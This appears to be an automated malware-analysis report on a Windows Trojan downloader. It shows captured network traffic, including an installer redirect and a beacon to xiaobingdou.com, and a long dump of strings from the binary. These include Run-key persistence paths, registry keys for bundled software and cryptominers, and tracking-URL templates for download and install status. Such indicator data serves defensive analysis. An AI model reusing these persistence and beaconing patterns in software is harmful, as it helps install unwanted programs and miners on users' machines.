X-Cache: HIT TCP_MEM_HIT dirn:1:444715889
X-Swift-SaveTime: Tue, 30 May 2017 13:18:40 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: c31b1fd214961513748805825e
[base]..anti=1..set_d=1..set_m=0HTTP/1.1 200 OK..Server: Tengine..Cont
ent-Type: application/octet-stream..Content-Length: 32..Connection: ke
ep-alive..Date: Tue, 30 May 2017 13:04:07 GMT..x-oss-request-id: 592D6
DC76FA177397CD51E5A..Accept-Ranges: bytes..ETag: "54038E4A450A3F429405
CCBE0DBFCFAE"..Last-Modified: Fri, 24 Feb 2017 08:50:01 GMT..x-oss-obj
ect-type: Normal..x-oss-hash-crc64ecma: 10919123851284209732..x-oss-st
orage-class: Standard..Content-MD5: VAOOSkUKP0KUBcy Db/Prg==..x-oss-se
rver-time: 2..Via: cache26.l2hk1[0,304-0,H], cache8.l2hk1[0,0], cache1
.de1[0,200-0,H], cache10.de1[0,0]..Age: 1927..X-Cache: HIT TCP_MEM_HIT
 dirn:1:444715889..X-Swift-SaveTime: Tue, 30 May 2017 13:18:40 GMT..X-
Swift-CacheTime: 3600..Timing-Allow-Origin: *..EagleId: c31b1fd2149615
13748805825e..[base]..anti=1..set_d=1..set_m=0..
<<< skipped >>>


GET /pcbrowser/down.php?pid=4043 HTTP/1.0
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: down2.uc.cn
Accept: */*
Connection: Keep-Alive


HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Tue, 30 May 2017 13:36:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10
Set-Cookie: PHPSESSID=q2mf36c5t5l3ulltohvn2iaue5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: hXXp://umcdn.uc.cn/down/4043/UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe



GET /anzhuang.aspx?NUQ0Q0RDNzlDNUFCQjQ2Njc2QTg5M0JCNUNEODRCQzE3MjFEMDBDNTdEQThEQTk1MzI4NDM3REJFNkYwOTRBNENCRkRDMjlFQUEzOUFDRjRGNTlBOUM0M0NEMEI0RUQ2RTcyNEY5MzREODM5QkY2MzFDOTk0QThDRENGOEU1MzE= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 30 May 2017 13:36:20 GMT
Connection: close
Content-Length: 1
1..



GET /js/geo2.js HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: cdn3.optimizely.com


HTTP/1.1 200 OK
Server: AmazonS3
Content-Length: 290
Content-Type: application/javascript
x-amz-id-2: gGAU2mEDtFFvD7ycmQ E V25vxWoHcSj5N37VNBlmtwFFNAgc4qEruHqt1etulj0 b833Mqb9Nw=
x-amz-version-id: Y1BKPK.c9lIaZx2uYj8JMWZye_vJfrh9
ETag: "adadfc5d7afd13e353d9d52cec1c7827"
x-amz-request-id: 0B414A2AB6ACE923
Cache-Control: max-age=67794
Date: Tue, 30 May 2017 13:35:59 GMT
Connection: close
(function(){.  window['optimizely'] = window['optimizely'] || [];.  wi
ndow['optimizely'].push(['activateGeoDelayedExperiments', {.    'locat
ion':{.      'city': "KHARKIV",.      'continent': "EU",.      'countr
y': "UA",.      'region': "".    },.    'ip':"194.242.96.218".  }]);.}
).//.()..;..







The Trojan connects to the servers at the folowing location(s):







%original file name%.exe_2624:




.text
`.rdata
@.data
.rsrc
@.reloc
4444444
j.hL1
t.hlB
t.hxB
t.hPp
t.hHB
t.hTB
j.Yf;
_tcPVj@
.PjRW
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
src\Path.cpp
0 <= n && n <= _dirs.size()
!_dirs.empty()
g:\pz_git\vendor\src\poco-1.5.4\foundation\src\FileStream_WIN32.cpp
g:\pz_git\vendor\src\poco-1.5.4\foundation\src\File_WIN32U.cpp
!_path.empty()
src\File.cpp
%<>{}|\"^`
https
bad or invalid port number
src\TemporaryFile.cpp
%Y-%m-%dT%H:%M:%S%z
%Y-%m-%dT%H:%M:%s%z
%w, %e %b %y %H:%M:%S %Z
%w, %e %b %Y %H:%M:%S %Z
%w, %d %b %Y %H:%M:%S %Z
%W, %e-%b-%y %H:%M:%S %Z
%W, %e %b %y %H:%M:%S %Z
%w %b %f %H:%M:%S %Y
%Y-%m-%d %H:%M:%S
Property not supported
src\BinaryWriter.cpp
src\Task.cpp
Windows 3.x
Windows 95
Windows 98
Windows NT
Windows Vista/Server 2008
Windows 7/Server 2008 R2
Windows 8/Server 2012
Windows 2000
Windows XP
Windows Server 2003/Windows Server 2003 R2
Windows 95/Windows NT 4.0
Windows ME
x:x:x:x:x:x
src\Process.cpp
inPipe == 0 || (inPipe != outPipe && inPipe != errPipe)
src\DateTime.cpp
src\TextConverter.cpp
src\NotificationCenter.cpp
src\ThreadPool.cpp
src\TextIterator.cpp
?g:\pz_git\vendor\src\poco-1.5.4\foundation\src\bignum.h
g:\pz_git\vendor\src\poco-1.5.4\foundation\src\bignum-dtoa.cc
g:\pz_git\vendor\src\poco-1.5.4\foundation\src\bignum.cc
g:\pz_git\vendor\src\poco-1.5.4\foundation\src\fast-dtoa.cc
g:\pz_git\vendor\src\poco-1.5.4\foundation\src\strtod.cc
g:\pz_git\vendor\src\poco-1.5.4\foundation\src\double-conversion.cc
src\NumericString.cpp
cannot create named event %s [Error %d: %s]
anonymous pipe
g:\pz_git\vendor\src\poco-1.5.4\foundation\src\PipeImpl_WIN32.cpp
windows-1250
Windows-1250
windows-1251
Windows-1251
windows-1252
Windows-1252
cannot allocate thread context key
cannot join thread
src\Thread.cpp
src\ErrorHandler.cpp
src\Net.cpp
Network failure while reading HTTP request header
Error reading HTTP request header
No HTTP request header
HTTP request method invalid or too long
HTTP request URI invalid or too long
Invalid HTTP version string
HTTP/1.0
HTTP/1.1
Unsupported Media Type
HTTP Version not supported
No HTTP response header
Invalid HTTP status code
HTTP reason string too long
src\HTTPSession.cpp
Cannot set the port number for an already connected session
Cannot set the proxy host and port for an already connected session
Cannot set the proxy port number for an already connected session
hXXp://
HTTP Exception
Unsupported HTTP redirect (protocol change)
FTP Exception
SMTP Exception
WebSocket Exception
Unknown or unsupported socket family.
src\MessageHeader.cpp
HttpOnly
; HttpOnly
()[]/|\',;
src\SocketImpl.cpp
Operation would block
Operation now in progress
Operation already in progress
Socket operation attempted on non-socket
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported
src\Socket.cpp
Invalid or unsupported address family passed to IPAddress()
0.0.0.0
Invalid address length passed to IPAddress()
Invalid prefix length passed to IPAddress()
src\SocketAddress.cpp
!hostAndPort.empty()
Missing port number
Invalid address length passed to SocketAddress()
unsupported IP address family
src\HTTPHeaderStream.cpp
src\HTTPStream.cpp
src\HTTPFixedLengthStream.cpp
src\HTTPChunkedStream.cpp
Invalid or unsupported address family passed to StreamSocketImpl
255.255.255.255
src\IPAddressImpl.cpp
mask() is only supported for IPv4 addresses
src\HostEntry.cpp
Not a valid registry key
RegDeleteKeyExW
: type not supported
Cannot open registry key:
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
Not a valid root key
Visual C   CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
GetProcessWindowStation
operator
MaxPolicyElementKey
hXXp://VVV.appinf.com/features/no-whitespace-in-element-content
hXXp://xml.org/sax/features/validation
hXXp://xml.org/sax/features/namespaces
hXXp://xml.org/sax/features/namespace-prefixes
hXXp://xml.org/sax/features/external-general-entities
hXXp://xml.org/sax/features/external-parameter-entities
hXXp://xml.org/sax/features/string-interning
hXXp://xml.org/sax/properties/declaration-handler
hXXp://xml.org/sax/properties/lexical-handler
hXXp://VVV.appinf.com/features/enable-partial-reads
src\NamePool.cpp
src\ParserEngine.cpp
Unexpected parser state - please send a bug report
Requested feature requires XML_DTD support in Expat
!_context.empty()
Unsupported SAX feature or property identifier
src\EntityResolverImpl.cpp
src\Element.cpp
src\XMLFilterImpl.cpp
xml=hXXp://VVV.w3.org/XML/1998/namespace
unexpected parser state - please send a bug report
requested feature requires XML_DTD support in Expat
expat_2.1.0
hXXp://VVV.w3.org/XML/1998/namespace
hXXp://VVV.w3.org/2000/xmlns/
0 <= i && i < static_cast<int>(_attributes.size())
src\AttributesImpl.cpp
src\AbstractContainerNode.cpp
Data is specified for a node which does not support data
The implementation does not support the type of object requested
A parameter or an operation is not supported by the underlying object
src\ElementsByTagNameList.cpp
src\AttrMap.cpp
src\DTDMap.cpp
src\ChildNodesList.cpp
hXXp://VVV.w3.org/xmlns/2000/
src\NamespaceSupport.cpp
_contexts.size() > 0
M%D,3
Unsupported or invalid date/time format
%w, %e %b %r %H:%M:%S %Z
%W, %e %b %r %H:%M:%S %Z
src\MemoryPool.cpp
src\URIStreamOpener.cpp
src\FileStreamFactory.cpp
uri.isRelative() || uri.getScheme() == "file"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Disk\Enum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\IDE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gpuminer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\gplyra
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gplyra
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cpuminer
.d
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
?h=X-X-X-X-X-X&r=%s_%s&t=%s&typeid=%d&status=%d&hid=%s&v=%s --- adadsada
?h=X-X-X-X-X-X&r=%s_%s%s&t=%s&hid=%s&v=%s --- adadsada
?h=X-X-X-X-X-X&r=%s_%s%s&onlinetime=%d --- sdadsada
?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&InstallState=0
?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&DownState=0
?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&DownState=1
?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&InstallState=1
?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&Failstate=1
?h=X-X-X-X-X-X&r=%s_%s%s&SoftName=%s&DownState=0&PreCheck=1
?h=X-X-X-X-X-X&r=%s_%s&d=%s&time=%d&first=%d
url=%s
?h=X-X-X-X-X-X&r=%s_%s%s&hid=%s&geturl=%s&size=%d&ok=%s&isaq=no --- sdadsada
?h=X-X-X-X-X-X&r=%s_%s%s&hid=%s&geturl=%s&finish=%s --- sdadsada
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
G:\pz_git\vendor\inc\Poco/String.h
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
%d / %d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
Rasapi32.dll
kernel32.dll
http\shell\open\command
HKEY_USERS\%s\Software\%s
HKEY_CURRENT_USER\Software\%s
%s /autostart
..\..\Src\Common\CommUtils.cpp
%s[%d]:%s
HKEY_USERS\%s\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
user32.dll
ntdll.dll
X:X:X:X:X:X
cmd.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
..\..\Src\Common\Adapter.cpp
X-X-X-X-X-X
%d.%d.%d.%d
..\..\Src\Common\EncryptFile.cpp
%s[%d]
Removing %s.
_unlink: %s
..\..\Src\Download\HttpDownload.cpp
No URLs found in %s.
FINISHED --%s--
Downloaded: %s bytes in %d files
Download quota (%s bytes) EXCEEDED!
Converted %d files in %.2f seconds.
Converting %s...
Cannot convert links in %s: %s
Unable to delete `%s': %s
%d-%d
.orig
Cannot back up %s as %s: %s
%d; URL=%s
/index.html
%s: %s: Not enough memory.
d:d:d
d-d-d d:d:d
utime(%s): %s
Failed to _unlink symlink `%s': %s
Get %.0f%% [%d/%d]
%7.2f %s
%.2f %s
%s: %s.
Error parsing proxy URL %s: %s.
Error in proxy URL %s: Must be HTTP.
%d redirections exceeded.
unlink: %s
%s.%d
http_proxy
ftp_proxy
..\..\Src\Download\DownLoadTask.cpp
Error in Set-Cookie, field `%s'
Syntax error in Set-Cookie: %s at position %d.
Cookie coming from %s attempted to set domain to %s
Cannot open cookies file `%s': %s
# HTTP cookie file.
# Generated by Wget on %s.
Error writing to `%s': %s
Error closing `%s': %s
PTF://
PTF://%s
hXXp://%s
Unsupported scheme
Bad port number
IPv6 addresses not supported
%s: %s
d\
index.html
*password*
%s: WGETRC points to %s, which doesn't exist.
%swget.ini
%s: Cannot read %s (%s).
%s: Error in %s at line %d.
%s: Invalid --execute command `%s'
%s: %s: Invalid boolean `%s', use `on' or `off'.
%s: %s: Invalid boolean `%s', use always, on, off, or never.
%s: %s: Invalid number `%s'.
%s: %s: Invalid byte value `%s'
%s: %s: Invalid time period `%s'
%s: %s: Invalid header `%s'.
HTTP/
Reusing connection to %s:%hu.
Referer: %s
User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
POST data file missing: %s
%s %s HTTP/1.0
User-Agent: %s
Host: %s%s%s%s
Accept: %s
%s%s%s%s%s%s%s%s%s%s
Failed writing HTTP request: %s.
%s request sent, awaiting response...
Read error (%s) in headers.
- %s
http-equiv=
Location: %s%s
.html
Refusing to truncate existing file `%s'.
(%s to go)
Warning: wildcards not supported in HTTP.
File `%s' already there, will not retrieve.
(try:-)
--%s-- %s
%s => `%s'
Cannot write to `%s' (%s).
http1!
ERROR: Redirection (%d) without location.
http2!
%s ERROR %d: %s.
Server file no newer than local file `%s' -- not retrieving.
%d %s
%s (%s) - `%s' saved [%ld/%ld]
%s URL:%s [%ld/%ld] -> "%s" [%d]
%s (%s) - `%s' saved [%ld]
%s URL:%s [%ld] -> "%s" [%d]
%s (%s) - Connection closed at byte %ld.
%s (%s) - `%s' saved [%ld/%ld])
%s (%s) - Connection closed at byte %ld/%ld.
%s (%s) - Read error at byte %ld (%s).
%s (%s) - Read error at byte %ld/%ld (%s).
%a, %d %b %Y %T
%A, %d-%b-%y %T
%a, %d-%b-%Y %T
%a %b %d %T %Y
%s:%s
%s: Basic %s
username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
Removing %s since it should be rejected.
http-equiv
%s: Cannot resolve incomplete link %s.
%s: Invalid URL %s: %s
%a %b %e %H:%M:%S %Y
%Y-%m-%d
%m/%d/%y
%I:%M:%S %p
%H:%M:%S
Resolving %s...
Found %s in g_host_name_addresses_map (%p)
failed: %s.
Wget %s%s
%s%s.HLP
Wget [%.0f%%] %s
Starting WinHelp %s
SetThreadExecutionState
Unable to convert `%s' to a bind address. Reverting to ANY.
Connecting to %s:%hu...
Connecting to %s[%s]:%hu...
%s@%s
Logging in as %s ...
The server refuses login.
Login incorrect.
==> TYPE %c ...
Unknown type `%c', closing control connection.
==> CWD %s ...
No such directory `%s'.
==> SIZE %s ...
couldn't connect to %s:%hu: %s
==> PORT ...
socket: %s
Bind error (%s).
Invalid PORT.
REST failed; will not truncate `%s'.
==> RETR %s ...
No such file `%s'.
No such file or directory `%s'.
accept: %s
Length: %s
[%s to go]
%s: %s, closing control connection.
%s (%s) - Data connection: %s;
%s (%s) -
File `%s' already there, not retrieving.
%s URL: %s [%ld] -> "%s" [%d]
.listing
Removed `%s'.
Symlinks not supported, skipping symlink `%s'.
%s: unknown/unsupported file type.
Remote file is newer than local file `%s' -- retrieving.
Remote file no newer than local file `%s' -- not retrieving.
Skipping directory `%s'.
%s: corrupt time-stamp.
%s/%s
Rejecting `%s'.
Not descending to `%s' as it is excluded/not-included.
Wrote HTML-ized index to `%s' [%ld].
No matches on pattern `%s'.
Wrote HTML-ized index to `%s'.
%*s[ skipping %dK ]
=%%
Invalid dot style specification `%s'; leaving unchanged.
-%%
%7.2f%s
ETA d:d
ETA %d:d:d
.netrc
password
login
%s: %s:%d: warning: "%s" token appears before any machine name
%s: %s:%d: unknown token "%s"
Cannot open %s: %s
Loading robots.txt; please ignore errors.
/robots.txt
%s%s%s
--> %s
--> PASS Turtle Power!
331 opiekey
331 s/key
%d,%d,%d,%d,%d,%d
PORT
WINDOWS_NT
Unsupported listing type, trying Unix listing parser.
%s%s%s@
Index of /%s on %s:%d
%d %s d
d:d
<a href="PTF://%s%s:%hu
(%s bytes)
-> %s
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip2
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\KuaiZip2
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
HKEY_LOCAL_MACHINE\SOFTWARE\KHT
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ludashi_is1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Ludashi_is1
G:\pz_git\vendor\inc\Poco/SharedPtr.h
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
G:\pz_git\vendor\inc\Poco/ScopedLock.h
G:\pz_git\vendor\inc\Poco/RefCountedObject.h
%s: Couldn't find usable socket driver.
: this object does't support a special last block
: this object doesn't support multiple channels
is not a valid key length
G:\pz_git\bin\kpzip.pdb
HttpQueryInfoA
InternetOpenUrlW
WININET.dll
SHLWAPI.dll
GetProcessHeap
CreatePipe
KERNEL32.dll
USER32.dll
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
IPHLPAPI.DLL
WS2_32.dll
VERSION.dll
GetCPInfo
PeekNamedPipe
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyA
zcÁ
ABEDABELABETABLEABUTACHEACIDACMEACREACTAACTSADAMADDSADENAFARAFROAGEEAHEMAHOYAIDAAIDEAIDSAIRYAJARAKINALANALECALGAALIAALLYALMAALOEALSOALTOALUMALVAAMENAMESAMIDAMMOAMOKAMOSAMRAANDYANEWANNAANNEANTEANTIAQUAARABARCHAREAARGOARIDARMYARTSARTYASIAASKSATOMAUNTAURAAUTOAVERAVIDAVISAVONAVOWAWAYAWRYBABEBABYBACHBACKBADEBAILBAITBAKEBALDBALEBALIBALKBALLBALMBANDBANEBANGBANKBARBBARDBAREBARKBARNBARRBASEBASHBASKBASSBATEBATHBAWDBAWLBEADBEAKBEAMBEANBEARBEATBEAUBECKBEEFBEENBEERBEETBELABELLBELTBENDBENTBERGBERNBERTBESSBESTBETABETHBHOYBIASBIDEBIENBILEBILKBILLBINDBINGBIRDBITEBITSBLABBLATBLEDBLEWBLOBBLOCBLOTBLOWBLUEBLUMBLURBOARBOATBOCABOCKBODEBODYBOGYBOHRBOILBOLDBOLOBOLTBOMBBONABONDBONEBONGBONNBONYBOOKBOOMBOONBOOTBOREBORGBORNBOSEBOSSBOTHBOUTBOWLBOYDBRADBRAEBRAGBRANBRAYBREDBREWBRIGBRIMBROWBUCKBUDDBUFFBULBBULKBULLBUNKBUNTBUOYBURGBURLBURNBURRBURTBURYBUSHBUSSBUSTBUSYBYTECADYCAFECAGECAINCAKECALFCALLCALMCAMECANECANTCARDCARECARLCARRCARTCASECASHCASKCASTCAVECEILCELLCENTCERNCHADCHARCHATCHAWCHEFCHENCHEWCHICCHINCHOUCHOWCHUBCHUGCHUMCITECITYCLADCLAMCLANCLAWCLAYCLODCLOGCLOTCLUBCLUECOALCOATCOCACOCKCOCOCODACODECODYCOEDCOILCOINCOKECOLACOLDCOLTCOMACOMBCOMECOOKCOOLCOONCOOTCORDCORECORKCORNCOSTCOVECOWLCRABCRAGCRAMCRAYCREWCRIBCROWCRUDCUBACUBECUFFCULLCULTCUNYCURBCURDCURECURLCURTCUTSDADEDALEDAMEDANADANEDANGDANKDAREDARKDARNDARTDASHDATADATEDAVEDAVYDAWNDAYSDEADDEAFDEALDEANDEARDEBTDECKDEEDDEEMDEERDEFTDEFYDELLDENTDENYDESKDIALDICEDIEDDIETDIMEDINEDINGDINTDIREDIRTDISCDISHDISKDIVEDOCKDOESDOLEDOLLDOLTDOMEDONEDOOMDOORDORADOSEDOTEDOUGDOURDOVEDOWNDRABDRAGDRAMDRAWDREWDRUBDRUGDRUMDUALDUCKDUCTDUELDUETDUKEDULLDUMBDUNEDUNKDUSKDUSTDUTYEACHEARLEARNEASEEASTEASYEBENECHOEDDYEDENEDGEEDGYEDITEDNAEGANELANELBAELLAELSEEMILEMITEMMAENDSERICEROSEVENEVEREVILEYEDFACEFACTFADEFAILFAINFAIRFAKEFALLFAMEFANGFARMFASTFATEFAWNFEARFEATFEEDFEELFEETFELLFELTFENDFERNFESTFEUDFIEFFIGSFILEFILLFILMFINDFINEFINKFIREFIRMFISHFISKFISTFITSFIVEFLAGFLAKFLAMFLATFLAWFLEAFLEDFLEWFLITFLOCFLOGFLOWFLUBFLUEFOALFOAMFOGYFOILFOLDFOLKFONDFONTFOODFOOLFOOTFORDFOREFORKFORMFORTFOSSFOULFOURFOWLFRAUFRAYFREDFREEFRETFREYFROGFROMFUELFULLFUMEFUNDFUNKFURYFUSEFUSSGAFFGAGEGAILGAINGAITGALAGALEGALLGALTGAMEGANGGARBGARYGASHGATEGAULGAURGAVEGAWKGEARGELDGENEGENTGERMGETSGIBEGIFTGILDGILLGILTGINAGIRDGIRLGISTGIVEGLADGLEEGLENGLIBGLOBGLOMGLOWGLUEGLUMGLUTGOADGOALGOATGOERGOESGOLDGOLFGONEGONGGOODGOOFGOREGORYGOSHGOUTGOWNGRABGRADGRAYGREGGREWGREYGRIDGRIMGRINGRITGROWGRUBGULFGULLGUNKGURUGUSHGUSTGWENGWYNHAAGHAASHACKHAILHAIRHALEHALFHALLHALOHALTHANDHANGHANKHANSHARDHARKHARMHARTHASHHASTHATEHATHHAULHAVEHAWKHAYSHEADHEALHEARHEATHEBEHECKHEEDHEELHEFTHELDHELLHELMHERBHERDHEREHEROHERSHESSHEWNHICKHIDEHIGHHIKEHILLHILTHINDHINTHIREHISSHIVEHOBOHOCKHOFFHOLDHOLEHOLMHOLTHOMEHONEHONKHOODHOOFHOOKHOOTHORNHOSEHOSTHOURHOVEHOWEHOWLHOYTHUCKHUEDHUFFHUGEHUGHHUGOHULKHULLHUNKHUNTHURDHURLHURTHUSHHYDEHYMNIBISICONIDEAIDLEIFFYINCAINCHINTOIONSIOTAIOWAIRISIRMAIRONISLEITCHITEMIVANJACKJADEJAILJAKEJANEJAVAJEANJEFFJERKJESSJESTJIBEJILLJILTJIVEJOANJOBSJOCKJOELJOEYJOHNJOINJOKEJOLTJOVEJUDDJUDEJUDOJUDYJUJUJUKEJULYJUNEJUNKJUNOJURYJUSTJUTEKAHNKALEKANEKANTKARLKATEKEELKEENKENOKENTKERNKERRKEYSKICKKILLKINDKINGKIRKKISSKITEKLANKNEEKNEWKNITKNOBKNOTKNOWKOCHKONGKUDOKURDKURTKYLELACELACKLACYLADYLAIDLAINLAIRLAKELAMBLAMELANDLANELANGLARDLARKLASSLASTLATELAUDLAVALAWNLAWSLAYSLEADLEAFLEAKLEANLEARLEEKLEERLEFTLENDLENSLENTLEONLESKLESSLESTLETSLIARLICELICKLIEDLIENLIESLIEULIFELIFTLIKELILALILTLILYLIMALIMBLIMELINDLINELINKLINTLIONLISALISTLIVELOADLOAFLOAMLOANLOCKLOFTLOGELOISLOLALONELONGLOOKLOONLOOTLORDLORELOSELOSSLOSTLOUDLOVELOWELUCKLUCYLUGELUKELULULUNDLUNGLURALURELURKLUSHLUSTLYLELYNNLYONLYRAMACEMADEMAGIMAIDMAILMAINMAKEMALEMALIMALLMALTMANAMANNMANYMARCMAREMARKMARSMARTMARYMASHMASKMASSMASTMATEMATHMAULMAYOMEADMEALMEANMEATMEEKMEETMELDMELTMEMOMENDMENUMERTMESHMESSMICEMIKEMILDMILEMILKMILLMILTMIMIMINDMINEMINIMINKMINTMIREMISSMISTMITEMITTMOANMOATMOCKMODEMOLDMOLEMOLLMOLTMONAMONKMONTMOODMOONMOORMOOTMOREMORNMORTMOSSMOSTMOTHMOVEMUCHMUCKMUDDMUFFMULEMULLMURKMUSHMUSTMUTEMUTTMYRAMYTHNAGYNAILNAIRNAMENARYNASHNAVENAVYNEALNEARNEATNECKNEEDNEILNELLNEONNERONESSNESTNEWSNEWTNIBSNICENICKNILENINANINENOAHNODENOELNOLLNONENOOKNOONNORMNOSENOTENOUNNOVANUDENULLNUMBOATHOBEYOBOEODINOHIOOILYOINTOKAYOLAFOLDYOLGAOLINOMANOMENOMITONCEONESONLYONTOONUSORALORGYOSLOOTISOTTOOUCHOUSTOUTSOVALOVENOVEROWLYOWNSQUADQUITQUODRACERACKRACYRAFTRAGERAIDRAILRAINRAKERANKRANTRARERASHRATERAVERAYSREADREALREAMREARRECKREEDREEFREEKREELREIDREINRENARENDRENTRESTRICERICHRICKRIDERIFTRILLRIMERINGRINKRISERISKRITEROADROAMROARROBEROCKRODEROILROLLROMEROODROOFROOKROOMROOTROSAROSEROSSROSYROTHROUTROVEROWEROWSRUBERUBYRUDERUDYRUINRULERUNGRUNSRUNTRUSERUSHRUSKRUSSRUSTRUTHSACKSAFESAGESAIDSAILSALESALKSALTSAMESANDSANESANGSANKSARASAULSAVESAYSSCANSCARSCATSCOTSEALSEAMSEARSEATSEEDSEEKSEEMSEENSEESSELFSELLSENDSENTSETSSEWNSHAGSHAMSHAWSHAYSHEDSHIMSHINSHODSHOESHOTSHOWSHUNSHUTSICKSIDESIFTSIGHSIGNSILKSILLSILOSILTSINESINGSINKSIRESITESITSSITUSKATSKEWSKIDSKIMSKINSKITSLABSLAMSLATSLAYSLEDSLEWSLIDSLIMSLITSLOBSLOGSLOTSLOWSLUGSLUMSLURSMOGSMUGSNAGSNOBSNOWSNUBSNUGSOAKSOARSOCKSODASOFASOFTSOILSOLDSOMESONGSOONSOOTSORESORTSOULSOURSOWNSTABSTAGSTANSTARSTAYSTEMSTEWSTIRSTOWSTUBSTUNSUCHSUDSSUITSULKSUMSSUNGSUNKSURESURFSWABSWAGSWAMSWANSWATSWAYSWIMSWUMTACKTACTTAILTAKETALETALKTALLTANKTASKTATETAUTTEALTEAMTEARTECHTEEMTEENTEETTELLTENDTENTTERMTERNTESSTESTTHANTHATTHEETHEMTHENTHEYTHINTHISTHUDTHUGTICKTIDETIDYTIEDTIERTILETILLTILTTIMETINATINETINTTINYTIRETOADTOGOTOILTOLDTOLLTONETONGTONYTOOKTOOLTOOTTORETORNTOTETOURTOUTTOWNTRAGTRAMTRAYTREETREKTRIGTRIMTRIOTRODTROTTROYTRUETUBATUBETUCKTUFTTUNATUNETUNGTURFTURNTUSKTWIGTWINTWITULANUNITURGEUSEDUSERUSESUTAHVAILVAINVALEVARYVASEVASTVEALVEDAVEILVEINVENDVENTVERBVERYVETOVICEVIEWVINEVISEVOIDVOLTVOTEWACKWADEWAGEWAILWAITWAKEWALEWALKWALLWALTWANDWANEWANGWANTWARDWARMWARNWARTWASHWASTWATSWATTWAVEWAVYWAYSWEAKWEALWEANWEARWEEDWEEKWEIRWELDWELLWELTWENTWEREWERTWESTWHAMWHATWHEEWHENWHETWHOAWHOMWICKWIFEWILDWILLWINDWINEWINGWINKWINOWIREWISEWISHWITHWOLFWONTWOODWOOLWORDWOREWORKWORMWORNWOVEWRITWYNNYALEYANGYANKYARDYARNYAWLYAWNYEAHYEARYELLYOGAYOKE
.?AVPropertyNotSupportedException@Poco@@
